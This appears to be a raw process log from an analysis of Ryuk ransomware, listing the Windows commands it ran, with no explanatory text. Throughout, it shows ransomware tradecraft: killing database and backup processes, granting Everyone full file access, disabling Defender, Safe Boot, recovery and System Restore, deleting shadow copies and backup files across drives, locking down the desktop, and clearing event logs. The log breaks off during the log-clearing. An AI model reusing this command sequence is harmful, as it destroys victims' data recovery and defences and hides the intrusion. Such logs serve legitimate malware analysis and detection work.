C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit

C:\Windows\system32\cmd.exe

cmd.exe /c taskkill /t /f /im sql*

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1

C:\Windows\system32\taskkill.exe

taskkill /f /t /im veeam*

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1

C:\Windows\system32\icacls.exe

icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\taskkill.exe

taskkill /t /f /im sql*

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\reg.exe

reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\reg.exe

reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c "C:\ProgramData\RyukReadMe.txt " && exit

C:\Windows\system32\cmd.exe

cmd.exe /c "C:\ProgramData\RyukReadMe.txt "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

cmd.exe /c vssadmin Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c wmic shadowcopy delete

C:\Windows\system32\cmd.exe

cmd.exe /c wmic shadowcopy delete

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /All /Quiet

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\cmd.exe

cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} recoveryenabled no

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\RyukReadMe.txt

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} boostatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

cmd.exe /c bcdedit /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c wbadmin delete catalog -quiet/

C:\Windows\system32\cmd.exe

cmd.exe /c wbadmin delete catalog -quiet/

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop avpsus /y

C:\Windows\system32\net.exe

net stop avpsus /y

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop avpsus /y

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet/

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop McAfeeDLPAgentService /y

C:\Windows\system32\net.exe

net stop McAfeeDLPAgentService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop McAfeeDLPAgentService /y

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop mfewc /y

C:\Windows\system32\net.exe

net stop mfewc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop mfewc /y

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop BMR Boot Service /y

C:\Windows\system32\net.exe

net stop BMR Boot Service /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BMR Boot Service /y

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop NetBackup BMR MTFTP Service /y

C:\Windows\system32\net.exe

net stop NetBackup BMR MTFTP Service /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY start=disabled

C:\Windows\system32\sc.exe

sc config SQLTELEMETRY start=disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY$ECWDB2 start= disabled

C:\Windows\system32\sc.exe

sc config SQLTELEMETRY$ECWDB2 start= disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SQLWriter start= disabled

C:\Windows\system32\sc.exe

sc config SQLWriter start= disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SstpSvc start= disabled

C:\Windows\system32\sc.exe

sc config SstpSvc start= disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /IM mspub.exe /F

C:\Windows\system32\taskkill.exe

taskkill /IM mspub.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopqos.exe /F

C:\Windows\system32\taskkill.exe

taskkill /IM mydesktopqos.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopservice.exe /F

C:\Windows\system32\taskkill.exe

taskkill /IM mydesktopservice.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q c:*.bac c:*.bak c:*.wbcat c:*.bkf c:Backup*.* c:ackup*.* c:*.set c:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q d:*.bac d:*.bak d:*.wbcat d:*.bkf d:Backup*.* d:ackup*.* d:*.set d:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q e:*.bac e:*.bak e:*.wbcat e:*.bkf e:Backup*.* e:ackup*.* e:*.set e:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q f:*.bac f:*.bak f:*.wbcat f:*.bkf f:Backup*.* f:ackup*.* f:*.set f:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q g:*.bac g:*.bak g:*.wbcat g:*.bkf g:Backup*.* g:ackup*.* g:*.set g:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q h:*.bac h:*.bak h:*.wbcat h:*.bkf h:Backup*.* h:ackup*.* h:*.set h:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del %0

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s hrmlog2

C:\Windows\system32\attrib.exe

attrib +h +s hrmlog2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\hrmlog2

C:\Windows\system32\attrib.exe

attrib +h +s C:\ProgramData\hrmlog2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wevtutil.exe el

C:\Windows\system32\wevtutil.exe

wevtutil.exe el

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "AMSI/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "AirSpaceChannel"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Application"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "DirectShowFilterGraph"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "DirectShowPluginControl"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Els_Hyphenation/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "EndpointMapper"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "FirstUXPerf-Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "ForwardedEvents"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "General Logging"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "HardwareEvents"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "IHM_DebugChannel"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Intel-iaLPSS-GPIO/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Intel-iaLPSS-I2C/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Intel-iaLPSS2-I2C/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Intel-iaLPSS2-I2C/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Internet Explorer"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Key Management Service"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MF_MediaFoundationDeviceMFT"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MF_MediaFoundationDeviceProxy"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MF_MediaFoundationFrameServer"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MedaFoundationVideoProc"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MedaFoundationVideoProcD3D"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationAsyncWrapper"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationContentProtection"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationDS"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationDeviceProxy"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationMP4"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationMediaEngine"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationPerformance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationPerformanceCore"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationPipeline"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationPlatform"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationSrcPrefetch"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-AppV-Client-Streamingux/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-AppV-Client/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-AppV-Client/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-AppV-Client/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-AppV-Client/Virtual Applications"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-AppV-SharedPerformance/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-IE/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-OneCore-Setup/Analytic"

C:\Windows\system32\wevtutil.exe

